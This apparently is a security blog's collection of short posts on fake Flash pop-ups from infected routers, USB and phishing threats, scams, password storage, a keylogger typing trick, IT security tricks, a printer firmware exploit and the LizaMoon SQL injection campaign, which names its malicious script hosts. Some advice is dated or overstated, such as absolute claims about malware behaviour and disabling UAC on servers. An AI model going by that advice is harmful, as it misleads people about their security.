WARNING! Your Flash Player may be out of date.

Adobe Flash Malware driven by infected "Router" The Moon Malware

Few days ago, I started to receive a pop-message "WARNING! Your Flash Player may be out of date". Please update to Continue., when I was trying to access websites like Facebook, YouTube, Google, etc.

If you're receiving a similar message then continue to read but make sure you don't click on anything nor try to update the flash player from the pop-window. You may check your current version of the "Adobe Flash Player" by visiting "Adobe" official website. If you're using Google Chrome browser, it already includes Adobe Flash Player built-in. Google Chrome will automatically update when new versions of Flash Player are available.

You will also notice that the same message is poping-up on all the devices which are connected to the same router (mobile phones, laptops etc.).

Now even the dumbest person should know it is not coming from computer but from the network which means your router is infected. It's commonly happening with Linksys, Asus and few other manufacturers.

How to fix this?

• Reset your router (by holding down the reset button under the router for 6 seconds). Note after restart all your ISP settings will be lost.
• Configure your router again with the ISP settings (username and password also required).
• Clear your browsers cache and pop-up message will not appear again.

Refer here for some basic tips on hardening your router to avoid such things happening again.

The Biggest Threat To Enterprise Is The Thumb Drive

How did Iranian nuclear facilities was destroyed? With a thumb drive. And how did Snowden allegedly smuggle out the blueprints to the NSA? With a thumb drive.

No, it wasn't by some ultra secretive means of super-complex cyber code writing and cloud encryption by which good ol' Eddy breached America's security in arguably the most secure compound on the planet — nope — he simply walked in with a thumb drive, downloaded the NSA, and walked out.

Carl Weinschenk of IT Business Times breaks down how bad a threat flash drives can be:

The U.S. Department of Homeland Security ran a test in which staffers dropped flash drives in the parking lot of government and contractor buildings. Sixty percent of folks who picked them up simply plugged them into networked computers. That percentage jumped to 90 percent if the drive had an official logo.

The Washington Times breaks down the threat further by reminding everyone that a "number of commercially available programs can switch off the USB port of every computer on the network."

NSA officials “were laying down on their job if they didn’t disable the USB port,” an unnamed government IT the specialist told the Washington Times, referring to the small socket on the side of a computer where thumb drives are plugged in.

Organizations, whether they're public or private, have had difficulty enforcing Bring Your Own Device security measures now for a number of years. Certainly there are places in government buildings where there are NO recording devices or storage devices allowed under ANY circumstances.

Regardless, Snowden managed to get one in and get one out.

Beware of Gumtree Scam: Scammer Targeted More Than 300 People on the Gumtree

Reports have emerged of series of scams, affecting people across Australia with similar scams on Gumtree

A male scam artist searches the wanted advertisements on site and then contacts the poster to say he has the item they are seeking.

The man then asks where the buyer lives and states he also lives nearby, but is working interstate so is unable to drop the goods off in person. Once the money is transferred to his account he ceases contact.

The scams have involved the attempted purchase of goods including mobile phones, iPads, electronic tablets and gift cards from stores including Coles, Myer and JB Hifi.

Reports of online scams can be made to the Australian Competition and Consumer Commission via www.scamwatch.gov.au or your specific country scamwatch website.

Cyber Threats: Trends in Phishing and Spear Phishing

Phishing is a global problem for businesses as well as individuals, targeting 37.3 billion people globally in the past year

Most of us have wisened up to basic scams and know better than to accept a Nigerian prince's offer of money, or a miraculous win on a Spanish lottery that you can't quite remember entering. But cyber criminals are raising their game and have evolved their tactics to target the more cyber-aware for greater returns.

Sophisticated 'spear phishing' attacks can be hard to spot by the experts; even the largest of organisations is not immune. What chance does this provide the average company or employee, let alone those who use computers infrequently?

Spear phishing is not random – cyber criminals identify employees within a target organisation and use social engineering tactics to construct a legitimate looking email. The FBI have warned business to be more aware of spear phishing tactics, as hackers target employees with administrative rights or access to critical systems.

91% of APTs (advanced persistent threats) start with phishing attacks and success could give cyber criminals the 'keys' to bypass security and initiate further attacks. Clicking a link doesn't mean that you are immediately compromised; phishing is part of a larger attack.

Hackers need to expose a system vulnerability and be able to install software quickly and quietly. However, cyber criminals use advanced tactics to disguise malicious attachments and sites to trick users into further action.

This infographic by Via Resource highlights trends and targets in phishing attacks.

Hackers steal photos, turn Wi-Fi cameras into remote surveillance device

Electronic manufacturers need to start putting some real thought into securing the devices and protecting privacy!

With so many people seizing the convenience of using their smartphone cameras to point, shoot and share, embedded GPS location and all, digital camera manufacturers have been offering more "social" options such as built-in Wi-Fi capabilities and camera apps to quickly share photos and videos.

In fact, if a digital single-lens reflex (DSLR) camera isn't Wi-Fi enabled, some photographers go the Wi-Fi SD card route and others create hacks to give that camera wireless file transfer capabilities.

While there have been plenty of researchers working on ways to exploit smartphones for remote spying, such as the scary PlaceRaider, an Android app that remotely exploits the camera and secretly snaps a picture every two seconds, there has not been as much research into exploiting DSLR Wi-Fi-enabled cameras. However, security researchers from ERNW changed that by showing how to exploit vulnerabilities in order to steal photos and turn a DSLR camera into a spying device.

In the presentation Paparazzi over IP, Mende and Turbing explained that there are four ways that the Canon EOS-1D X can communicate with a network via FTP, DLNA (Digital Living Network Alliance), WFT (Wireless File Transmitter) and the EOS Utility Mode.

They were able to attack and exploit all four, saying, "Not only did we discover weak plaintext protocols used in the communication, we've also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the 'upload to the clouds' feature resulted in an image stealing Man-in-the-Imageflow."

 

Refer here to read further details.

Are Personal Password Database Sites Safe & Secure?

Basic tips & techniques for your daily password management!

Earlier this month, there was an expert on a popular U.S. morning news show advising people to use personal password database sites to keep track of their passwords. I couldn't disagree more.

While I commend the expert for advising people to use multiple, diverse and difficult-to-guess passwords for their different online accounts, I do not believe storing these passwords in the cloud is the best idea.

Here are four password-keeper services I saw recently being promoted for use within this Payment Systems post. Here are my thoughts on each of the four: 

KeePass: If you want to use this service, use it with a USB instead of Dropbox, which has had some security breaches in the past year. Although Dropbox recently announced improved security, I still don't want to entrust my passwords to a cloud service of any kind (Keep in mind lots of folks working for the cloud service have access to the info, simply as a matter of supporting the service.)

1Password: I'm leery. If someone else gets my computer, will the service's web integration allow them to access all my accounts? I pass on 1Password. 

LastPass and RoboForm: Many security folks approve of LastPass and RoboForm. Indeed, the services have been around for a few years. But I do not like the lack of information about how they secure their sites. I would not use these services, as they are cloud-based, and I simply do not want to share my passwords with others in this way. If you want to use them for managing the passwords for your websites with non-sensitive information, that's an option. However, keep your banking and other financial passwords with you and don't share with an online site.

It continues to be important to have multiple and varied passwords. At a minimum, your social networking passwords should be vastly different from your financial and banking passwords.

As for how to keep a record of these sites, if you don't want to use a password management service like KeePass to store your passwords on your own devices, try an encrypted Excel file, or even a good old-fashioned notebook that you keep locked away.

These alternatives may not be high-tech, but given the password management cloud services sites' vulnerabilities, it's much safer right now than relying on cloud-based services, which are major targets for hackers.

Techniques to Protect Yourself on Social Networks

Security tips from ISACA Journal

Vigilance continues to spearhead the security and, thus, the privacy of the information. It can be broken down into a few techniques that are simple but could make all the difference:

Choice of “friends” and contacts—Users should be extremely careful in their choice of friends on these networks. It is common practice to accept contact from friends of friends who are frequently complete strangers. This can lead to one’s private life being exposed to potentially harmful individuals.

Restricting private content to close friends and family only—Social networking sites are increasingly allowing their users to configure restrictions on access to their information. It is, therefore, important to use these restrictions and to ensure that they are properly configured, given that our information is public by default.

Careful choice of information to be broadcast—The key to the protection of privacy is, in fact, what information one broadcasts. Name, surname, date of birth, place of birth, photos, videos, comments and opinions should be carefully screened prior to being posted. Keep in mind that information posted on a network may one day be used against its author.

Awareness—Every sector of the population should be made aware of the need to protect themselves against the risk that the use of social networks may entail. In the business world, this awareness must form part of the IT security program.

Finally, social networks are a great way to express oneself and share with others. They help users lift the barriers of space and time and communicate with the world. However, there is another side associated with the proven dangers of user privacy violation.

These dangers are even more of a threat now thanks to the increasingly widespread trend of registering on several sites using a single user account. In response to this situation, each Internet user must remain vigilant and governments must put more pressure on the operators of these sites to safeguard the security of Internet users.

Read Guy-Hermann Ngambeket Ndiandukue’s full article, “Social Networks and Privacy—Threats and Protection,” in the current issue of the ISACA Journal, in which you will also find additional coverage of timely and relevant issues affecting the ISACA professional communities.

How to Spot a Fake LinkedIn Profile

Scams on Linkedin Exposed. How gullible job-seekers are beguiled!


LinkedIn is no stranger to fraud, having recently survived a heavily scrutinized password breach.


Unfortunately, it's largely up to you to protect yourself from falling into the snare of a scam artist posing as a legitimate professional connection. Understand that once you are linked with a fraudsters there is no telling what type of scams they will try to pull on you.


They may also victimize your other connections if you allow your linked connections to see one another (you can change your settings to prevent this). Because some LinkedIn users are in the practice of accepting all invitations, it's incredibly important to look out for scammers.


John Thomas of Bloglerati has put together an excellent collection of fake profiles on his Facebook page, along with the following red flags for spotting fake LinkedIn profiles:

• Lower case first and last name
• Stock photo for profile picture
• Minimal info in profile
• Belongs to a large number of groups
• Generic company name
• Rhythmic names, like Sam Smith or Joe Johnson

An easy way to defeat a “Keylogger”

How to defeat a "Keylogger" without any software/hardware


There are several ways to defeat a keylogger. Here is an easy way which does not need any software or hardware. It is not a revolutionary but quite an useful technique.


Some of you may already be practicing the same. Keyloggers and Trojans can steal you passwords, credit card details or important information while you type them on your system. We are sometimes bound to use third party systems or even our own systems may be compromised (of which we may not be aware of). 


How do we defeat a "Keylogger"?


Let’s assume your password is “savemefromkeyloggers”.


When you type the password you need to ensure that you type the above password in a different obfuscated scheme. Here is an explanation through an example.


Step 1: Type “veme”


Step 2: Use your mouse pointer to bring the cursor just before “veme” and type “sa”. So what you see is “saveme” but the keylogger log would read as “vemesa”


Step 3: Use your mouse pointer to bring the cursor just after “saveme” and type “ggers”. So what you see is “savemeggers” but the keylogger log would read as “vemesaggers”


Step 4: Use your mouse pointer to bring cursor before “ggers” and type “fromkeylo”.


So what you see is “savemefromkeyloggers” but the keylogger log would read as “vemesaggersfromkeylo”


Please note that you do not use the “arrow keys” to move the cursor. Use the mouse to click at the right place so that the password key strokes are jumbled up and the keylogger owner would not be able to understand your real password.


So you can create your own method to jumble up/obfuscate your “credit card number”, “CSV”, “passwords” or anything that is critical.


It is a good practice to always use the same pattern to obfuscate the same data since it would make it more difficult for anybody to decode the real password from a single sample of obfuscated password.


It becomes easier to decode when there is a sample of several obfuscated forms of the same password. This technique is quite useful if you are using a shared computer such as cyber cafes, etc.

10 Crazy IT Security Tricks That Actually Work

IT security threats are constantly evolving. It's time for IT security pros to get ingenious


Network and endpoint security may not strike you as the first place to scratch an experimental itch. After all, protecting the company's systems and data should call into question any action that may introduce risk.


But IT security threats constantly evolve, and sometimes you have to think outside the box to keep ahead of the more ingenious evildoers. And sometimes you have to get a little crazy.


10 security ideas that have been -- and in many cases still are -- shunned as too offbeat to work but that function quite effectively in helping secure the company's IT assets.


The companies employing these methods don't care about arguing or placating the naysayers. They see the results and know these methods work, and they work well.


Innovative security technique No. 1: Renaming admins


Renaming privileged accounts to something less obvious than "administrator" is often slammed as a wasteful, "security by obscurity" defense. However, this simple security strategy works. If the attacker hasn't already made it inside your network or host, there's little reason to believe they'll be able to readily discern the new names for your privileged accounts.


If they don't know the names, they can't mount a successful password-guessing campaign against them. Even bigger bonus? Never in the history of automated malware -- the campaigns usually mounted against workstations and servers -- has an attack attempted to use anything but built-in account names. By renaming your privileged accounts, you defeat hackers and malware in one step. Plus, it's easier to monitor and alert on log-on attempts to the original privileged account names when they're no longer in use.


Innovative security technique No. 2: Getting rid of admins


Another recommendation is to get rid of all wholesale privileged accounts: administrator, domain admin, enterprise admin, and every other account and group that has built-in, widespread, privileged permissions by default.


True, Windows still allows you to create an alternate Administrator account, but today's most aggressive computer security defenders recommend getting rid of all built-in privileged accounts, at least full-time. Still, many network admins see this as going a step too far, an overly draconian measure that won't work. Well, at least one Fortune 100 company has eliminated all built-in privileged accounts, and it's working great.


The company presents no evidence of having been compromised by an APT (advanced persistent threat). And nobody is complaining about the lack of privileged access, either on the user side or from IT. Why would they? They aren't getting hacked.


Innovative security technique No. 3: Honeypots


Modern computer honeypots have been around since the days of Clifford Stoll's "The Cuckoo's Egg," and they still don't aren't as respected or as widely adopted as they deserve. A honeypot is any computer asset that is set up solely to be attacked. Honeypots have no production value.


They sit and wait, and they are monitored. When a hacker or malware touches them, they send an alert to an admin so that the touch can be investigated. They provide low noise and high value. The shops that use honeypots get notified quickly of active attacks. In fact, nothing beats a honeypot for early warning -- except for a bunch of honeypots, called a honeynet.


Innovative security technique No. 4: Using nondefault ports


Another technique for minimizing security risk is to install services on nondefault ports. Like renaming privileged accounts, this security-by-obscurity tactic goes gangbusters. When zero-day, remote buffer overflow threats become weaponized by worms, computer viruses, and so on, they always -- and only -- go for the default ports.


This is the case for SQL injection surfers, HTTP worms, SSH discoverers, and any other common remote advertising port. Recently Symantec's pcAnywhere and Microsoft's Remote Desktop Protocol suffered remote exploits. When these exploits became weaponized, it was a race against the clock for defenders to apply patches or block the ports before the worms could arrive. If either service had been running on a nondefault port, the race wouldn't even begin.


That's because in the history of automated malware, malware has only ever tried the default port.


Innovative security technique No. 5: Installing to custom directories


Another security-by-obscurity defense is to install applications to nondefault directories. This one doesn't work as well as it used to, given that most attacks happen at the application file level today, but it still has value.


Like the previous security-by-obscurity recommendations, installing applications to custom directories reduces risk -- automated malware almost never looks anywhere but the default directories. If malware is able to exploit your system or application, it will try to manipulate the system or application by looking for default directories. Install your OS or application to a nonstandard directory and you screw up its coding.


Changing default folders doesn't have as much bang for the buck as the other techniques mentioned here, but it fools a ton of malware, and that means reduced risk.


Innovative security technique No. 6: Tarpits 


Today, many networks (and honeypots) have tarpit functionality, which answers for any nonvalid connection attempt. The only downside: Tarpits can cause problems with legitimate services if the tarpits answer prematurely because the legitimate server responded slowly. Remember to fine-tune the tarpit to avoid these false positives and enjoy the benefits.


Innovative security technique No. 7: Network traffic flow analysis


With foreign hackers abounding, one of the best ways to discover massive data theft is through network traffic flow analysis. Free and commercial software is available to map your network flows and establish baselines for what should be going where. That way, if you see hundreds of gigabytes of data suddenly and unexpectedly heading offshore, you can investigate.


Most of the APT attacks I've investigated would have been recognized months earlier if the victim had an idea of what data should have been going where and when.


Innovative security technique No. 8: Screensavers


Password-protected screensavers are a simple technique for minimizing security risk. If the computing device is idle for too long, a screensaver requiring a password kicks in. Long criticized by users who considered them nuisances to their legitimate work, they're now a staple on every computing device, from laptops to slates to mobile phones.


Innovative security technique No. 9: Disabling Internet browsing on servers


Most computer risk is incurred by users' actions on the Internet. Organizations that disable Internet browsing or all Internet access on servers that don't need the connections significantly reduce that server's risk to maliciousness. You don't want bored admins picking up their email and posting to social networking sites while they're waiting for a patch to download.


Instead, block what isn't needed. For companies using Windows servers, consider disabling UAC (User Account Control) because the risk to the desktop that UAC minimizes isn't there. UAC can cause some security issues, so disabling it while maintaining strong security is a boon for many organizations.


Innovative security technique No. 10: Security-minded development


Any organization producing custom code should integrate security practices into its development process -- ensuring that code security will be reviewed and built in from day one in any coding project. Doing so absolutely will reduce the risk of exploitation in your environment.


This practice, sometimes known as SDL (Security Development Lifecycle), differs from educator to educator, but often includes the following tenets: use of secure programming languages; avoidance of knowingly insecure programming functions; code review; penetration testing; and a laundry list of other best practices aimed at reducing the likelihood of producing security bug-ridden code.


Microsoft, for one, has been able to significantly reduce the number of security bugs in every shipping product since instituting SDL. It offers lessons learned, free tools, and guidance at its SDL website.


This story, "10 crazy IT security tricks that actually work," was originally published at InfoWorld.com.

Why Business Continuity is Critical For Your Business?

4 Tips to Gain Upper Management Attention


Companies often make many strategic decisions such as outsourcing, off-shoring and long supply chains without full consideration of the consequence of business interruption.


They primarily focus in adding short-term value to the bottom-line, but when these strategies fail to deliver, reputation and brand image are compromised. Short-term financial losses might be containable, but long-term loss of market share is often much more damaging.


By implementing effective business continuity plans, businesses can increase their recovery capabilities dramatically. And that means they can make the right decisions quickly, cut downtime and minimize financial losses. So, getting buy-in at the top is crucial. It requires professionals to have better understanding of the concerns of top management and an ability to communicate risk issues in a common language.


Here are a few ways business continuity practitioners can seek upper management attention.


Emphasize business consequences: Many leaders were shaken by the corporate impact that the Gulf of Mexico oil spill incident had on the finances, share-price and reputation of British Petroleum.


Business continuity managers need to bring these real-life cases in their presentation to management and further use their skills to identify their own organization's potential high consequence events. 


Implement innovative tests and exercises: A traditional difficulty is that BCM practitioners do not report at a high enough level to affect decisions. Although often true, they are not without influence, and one way to use it is in developing an innovative testing and exercising program.


In the past, too many exercises have concentrated on evacuation, safety and emergency response. Although these are required, top management employs specific specialists to handle safety and security on their behalf. 


What BC practitioners need to do is choose scenarios and techniques in their exercises that really interest the leadership team. Using scenarios that highlight fundamental business threats and challenging top management to respond can be scary, but it also can raise the profile of BCM rapidly.


Techniques such as war games, stress testing, scenario planning and horizon scanning are becoming important to business continuity tests. These are areas in which the BCM professional could and (in the future) really should take a leading role.


Be more assertive: BCM professionals can get top level attention by taking a more assertive position to organizational change. Clearly, there are limits to which individuals can become involved in strategic decisions, but by producing a well considered analysis of the consequences of change, they can often get senior management interest.


Decisions can be reviewed or modified if consequential risks are better articulated. BCM professionals can do this through a risk management organizational framework and can make their voice heard.


Communicate BCM benefits: Practitioners must concentrate on finding value and benefits for BCM and promoting them.


For example, if having proper BCM in place helps the organization get on the approved supplier list for a major customer, it's the BC professional's job to ensure that everyone knows about it. If it were a key deciding factor that actually won a big contract, make sure that sales, marketing and finance recognize and publicize that fact.


If BCM helps procurement eliminate high-risk suppliers, again getting that message out through whatever communication vehicles is key.

Ernst & Young: Attacking the smart grid

Penetration testing techniques for industrial control systems and advanced metering infrastructure


The industrial control systems that provide automation for critical infrastructure have recently come under increased scrutiny, and the need to protect current infrastructure as well as integrate security into new system design is now a top priority. Penetration testing has become the latest trend in the ICS space; however, the cultural and technological differences between control systems and traditional IT systems have caused confusion around how to perform a penetration test safely and effectively. 


In this briefing, we will discuss the changing landscape in control system architecture, with special attention paid to smart grid infrastructure, and highlight the implications for security. A description of the lifecycle of a penetration test is followed by a breakdown of a typical ICS infrastructure. Specific penetration testing activities are explained for each component to provide insight for control system engineers and management into how penetration testing can benefit their organization.


Refer here to download the whitepaper.

Signcryption: New Technology & Standard to improve Cyber Security

Signcryption is a technology that protects confidentiality and authenticity, seamlessly and simultaneously

For example, when you log in to your online bank account, signcryption prevents your username and password from being seen by unauthorized individuals. At the same time, it confirms your identity for the bank.

UNC Charlotte professor Yuliang Zheng invented the revolutionary new technology and he continues his research in the College of Computing and Informatics. After nearly a three-year process, his research efforts have been formally recognized as an international standard by the International Organization of Standardization (ISO).

News of the ISO adoption comes amidst daily reports of cyber attack and cyber crime around the world. Zheng says the application will also enhance the security and privacy of cloud computing.

“The adoption of signryption as an international standard is significant in several ways,” he said. “It will now be the standard worldwide for protecting confidentiality and authenticity during transmissions of digital information.”

“This will also allow smaller devices, such as smartphones and PDAs, 3G and 4G mobile communications, as well as emerging technologies, such as radio frequency identifiers (RFID) and wireless sensor networks, to perform high-level security functions,” Zheng said.

“And, by performing these two functions simultaneously, we can save resources, be it an individual’s time or be it energy, as it will take less time to perform the task.”

DDoS Testing Methodology

A methodology to measure the resiliency of network infrastructure against DDoS and botnet attacks

Distributed denial of service (DDoS) attacks are rampant, successfully targeting Fortune 100 businesses, not to mention government, news media, communication and financial networks throughout the world. It has become more important to assess network equipment and application servers using these same attacks. Only through realistic attack simulation can organizations visualize their own weaknesses and vulnerabilities within the IT infrastructure and how resilient these elements are when under attack.

DDoS Testing Methodology

BreakingPoint has created a definitive DDoS testing methodology that creates a variety of attacks to help users find their network weaknesses before others do. Such attacks include the following:

• DDoS designed to consume all available bandwidth, all disk space or all available CPU cycles
  
  
• DDoS designed to disrupt important information flow such as routing tables by injecting false routes, thus causing packets to be misrouted
  
  
• DDoS designed to break the physical layer of the network and obstruct the communication between the end-point and the user
  
  
• Botnets designed to send large quantities of unsolicited e-mail to trigger Delivery Server Notifications to spoofed originating email addresses

To download the methodology please refer here (registration may be required)

What does it really take to exploit a printer?

Printer Hack: Researchers Can Set Media’s Pants on Fire

In the past couple of weeks, there has been quite a bit of press and blogging about a security vulnerability in HP printers that was discovered by researchers in the Intrusion Detection Lab at Columbia University.

In a nutshell, the researchers found a way to replace the operating firmware on an HP printer with firmware of their own design that can do bad things, and they also found a way to do it to a printer that is on a private network behind a firewall.

MSNBC ran an “exclusive” story about it calling it a “devastating attack” to which “millions of printers” could be subjected. Its lede suggested that hackers could cause the printer to catch fire, or be used for identity theft, or be used to take control of entire networks.

In practice, this isn’t an easy vulnerability to exploit on a large scale.

Let me explain:

First, you need to target a printer that supports PJL and its largely undocumented remote firmware update (RFU) function. Many printers support PJL, but RFU is less commonly supported. Many printers don’t have any mechanism for remote updates, and many others use something other than PJL’s RFU function for remote updates.

Once you've found a printer that supports PJL and its RFU function, you'll need to make sure that it will apply a firmware update without checking its authenticity. I can’t speak for other manufacturers, but my employer’s products have been using digital signature verification for firmware updates for at least the seven plus years that I have worked for them.

Next, you need to be able to create new firmware to do your bidding. To do that, you need to know what is the manufacturer and model of your target. The researchers demonstrated exploitation of a victim’s printer that was on a private, firewalled network, but didn’t mention how they determined which make and model of printer would be used by a particular victim. They would need to know that in order to send the correct firmware image to the victim.

And then there is the matter of reverse-engineering printer firmware. It is certainly possible, but not very practical when you consider that there are thousands of different printer models to contend with.

The researchers say that “rewriting the printer’s firmware takes only about 30 seconds”, but they are referring to the time it takes for the printer to update its flash memory and not how long it takes for someone to reverse-engineer a printer to do something malevolently useful.

Next, you need to get the victim to print a document that contains the firmware update code, and of course they need to print it on the printer that you targeted. I don’t know if it is possible to embed an RFU in a printable document in such a way that isn’t obvious when the document is viewed, as most people do before they print something. Perhaps they will disclose that detail at the Chaos conference.

Now, finally, you own the victim’s printer.

Security Training Video: Investigating DoS Attacks

Introduction to DoS Attacks and techniques

CareerAcademy.com is offering a free EC-Council training video to try out their training delivery platform.

The course offered is on Computer Hacking Forensics Investigator (CHFI): Investigating DoS Attacks, and is intended for IT security professionals. The course outline is below, along with a link to try it out.

Please feel free to forward to others in your organization who may be interested this type of training.

Link to sign up for the free training course:
http://www.careeracademy.com/download/freeCHFIm31.html

Course Description:

This free introductory online training course (Value at $195) will immerse the student in an interactive environment where they will be shown how to investigate DoS attacks. Students will be introduced to the types of DoS attacks, buffer overflow, DoS attack techniques, intrusion detection systems, live demonstrations of SYN Flooding, Smart Sniff, 3D Trace Routes, and many more critical concepts.

Use the link above to sign up, and or more information, visit www.careeracademy.com or contact CareerAcademy.com at 1-800-807-8839 x201 (US), 1-781-453-3900 x201 (International), email: info@careeracademy.com

This course is Module 31 of a 51 module EC-Council Computer Hacking Forensic Investigator CHFI Training CBT Boot Camp.

Massive SQL injection attack

Mass Injection hits over 694,000 URLs

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to directly perform actions against databases, are largely independent of the technology used to develop the applications themselves: the programming errors that allow SQL injection can be made in virtually any language.

The underlying cause is a programmer trusting input that comes from a Web page—either a value from a form, or a parameter in a URL—and passing this input directly into the database. If the input is malformed in a particular way, the result is that the database will run code of the attacker's choosing. In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically "http://lizamoon.com/ur.php" or more recently, "http://alisa-carter.com/ur.php." Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing. The injected code is also found on a number of product pages on Apple's iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple's system.

However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified. SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands.

In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia. It's been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Advanced evasion techniques can bypass network security

After "APT", we now have "AET"

A new hacking technique creates a mechanism for hackers to smuggle attacks past security defences, such as firewalls and intrusion prevention systems.

So-called advanced evasion techniques (AET) are capable of bypassing network security defences, according to net appliance security firm Stonesoft, which was the first to document the approach. Researchers at the Finnish firm came across the attack while testing its security appliance against the latest hacker exploits.

Various evasion techniques including splicing and fragmentation have existed for years. Security devices have to normalise traffic using these approaches before they can inspect payloads and block attacks.

Refer here to read more details.